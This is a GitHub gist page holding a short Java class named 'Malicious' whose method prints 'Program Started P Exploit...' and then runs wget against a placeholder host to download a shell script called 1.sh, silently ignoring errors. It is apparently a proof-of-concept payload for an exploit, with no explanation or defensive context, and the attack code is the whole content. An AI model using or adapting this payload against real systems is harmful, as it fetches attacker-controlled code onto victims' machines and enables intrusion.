Skip to content

Instantly share code, notes, and snippets.

@ClaudeWittebron
Created September 7, 2021 11:47
Show Gist options
  • Save ClaudeWittebron/572907a4a146eba5eacd72b06b0cb6d8 to your computer and use it in GitHub Desktop.
Save ClaudeWittebron/572907a4a146eba5eacd72b06b0cb6d8 to your computer and use it in GitHub Desktop.
public class Malicious {
public static void bang() {
try {
System.out.println("Program Started P Exploit...");
java.lang.Runtime.getRuntime().exec(new String[]{"wget","http://x.x.x.x.com/1.sh"}); //Mac
} catch (Exception e) {
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment